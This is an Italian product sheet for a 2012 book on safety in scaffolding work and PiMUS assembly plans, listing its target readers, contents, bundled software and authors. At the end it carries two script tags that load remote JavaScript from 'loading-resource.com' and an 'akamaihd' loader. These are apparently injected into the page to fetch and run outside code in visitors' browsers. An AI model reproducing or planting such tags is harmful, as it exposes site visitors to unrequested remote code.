SCHEDA LIBRO
TITOLO Cantieri e lavori in quota. PiMUS
COLLANA Sicurezza
EDITORE WOLTERS KLUWER ITALIA
PAGINE 352
Codice 142132
Prezzo € 95,00
TIPOLOGIA EDITORIALE Guida operativa
ARGOMENTO Sicurezza in edilizia
Anno:2012 (ottobre)
L’attività nei cantieri edili, specialmente nei lavori che si svolgono in quota, è, notoriamente, ad alto rischio infortunistico. Fra le fasi lavorative più pericolose sono senz’altro da annoverare quelle di montaggio, trasformazione, uso e smontaggio dei ponteggi. Il volume edito da Wolters Kluwer Italia per la linea editoriale “TecnicaMente” si rivolge a tutti gli operatori che abbiano a che fare con l’oggetto “ponteggio” e, in particolare, agli addetti e preposti che frequentino il percorso di formazione per acquisire il “patentino” necessario per poter montare, smontare e trasformare tale opera provvisionale. Inoltre, è d’ausilio anche agli utilizzatori dei ponti su ruote a torre.
Target
• Professionisti tecnici: Ingegneri, Geometri, Architetti
• Imprese edili: Titolari, Committenti, Responsabili dei lavori, Progettisti e Direttori dei Lavori, Coordinatori della sicurezza nei cantieri
• Enti locali, ASL
• Scuole edili, Comitati paritetici territoriali
• Consulenti per la sicurezza ed il lavoro, Consulenti tecnici
• Società di formazione, Docenti
Contenuti
Il volume presenta:
• il piano di montaggio, uso e smontaggio in sicurezza (Pi.M.U.S.) dei ponteggi e dei ponti su ruote
• le autorizzazioni ministeriali e i casi in cui è necessario un progetto del ponteggio
• le nozioni tecniche necessarie
• i dispositivi di protezione individuale utilizzati, gli ancoraggi e le verifiche di sicurezza
• le tipologie e le tecniche degli ancoraggi e dei supporti
• le verifiche di sicurezza dei ponteggi
• il montaggio, lo smontaggio, la trasformazione dei ponteggi a tubi e giunti (PTG)
• il montaggio, lo smontaggio, la trasformazione dei ponteggi a telai prefabbricati (PTP)
• il montaggio, lo smontaggio, la trasformazione dei ponteggi a montanti e traversi prefabbricati (PMTP)
• il montaggio, lo smontaggio, la trasformazione di ponti su ruote a torre
• elementi di gestione di prima emergenza e salvataggio
In Appendice le sanzioni inerenti le attività con i ponteggi e la Guida commentata alla normativa di riferimento.
DVD-Rom
All’opera è allegato il software Blumatica PiMUS Light, che consente la redazione del PiMUS (Piano di Montaggio, Uso e Smontaggio) sia per ponteggi a telai prefabbricati, sia per ponteggi a tubi e giunti, ai sensi del D.Lgs. n. 81/2008 e s.m.i.
Gli autori
Marco Grandi Ingegnere, è Responsabile della U.O. Vigilanza Tecnica presso la Direzione Territoriale del Lavoro del Verbano Cusio Ossola. Abilitato come coordinatore per la progettazione e l’esecuzione dei lavori nei cantieri. Si occupa, oltre che dell’attività di vigilanza, di formazione e promozione in materia di salute e sicurezza sui luoghi di lavoro. Referente della Commissione Sicurezza dell’Ordine degli Ingegneri del VCO, è autore di diverse pubblicazioni su autorevoli riviste specializzate del settore, nonché di monografie sul tema della salute e sicurezza nei luoghi di lavoro.
Maurizio Magri Ingegnere, laureatosi in Ingegneria civile presso il Politecnico di Torino. Già progettista di strutture e abilitato coordinatore per la sicurezza nei cantieri, nonché funzionario tecnico in diversi Enti Pubblici, è Responsabile della U.O. Vigilanza Tecnica presso la Direzione Regionale del Lavoro del Piemonte. Membro di diverse commissioni tecniche prefettizie e regionali ed esperto dell’ispezione tecnica, in particolare per quanto riguarda le opere provvisionali e le attrezzature, è formatore interno al Ministero del Lavoro e relatore in convegni e corsi di formazione, nonché autore di articoli tecnici per riviste specializzate e di monografie sul tema della salute e sicurezza nei luoghi di lavoro.
Blumatica S.r.l. Dai primi anni ’90 sviluppa soluzioni software per l’edilizia e la sicurezza caratterizzate da innovazioni tecnologiche di facile usabilità, rappresentando un valido riferimento per gli uffici tecnici e i professionisti del settore.
La Linea editoriale “TecnicaMente”
Volumi pratici e operativi, veri e propri strumenti di lavoro per un’ampia casistica di problematiche in ambito tecnico, dalla progettazione alla sicurezza, dalla normativa all’impiantistica: la collana TecnicaMente è l’ultima nata in Wolters Kluwer, studiata per le professioni tecniche e le imprese.
Testi per architetti, ingegneri e geometri, scritti da professionisti del settore con un taglio molto pratico, propongono soluzioni per risolvere i problemi quotidiani di chi opera sul campo. I volumi sono spesso accompagnati da cd-rom e/o software, applicativi gestibili con facilità per la soluzione e la relazione delle varie operazioni legate a calcoli, sicurezza, progettazione, programmazione, disegno.
link:www.leprofessionitecniche.it
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>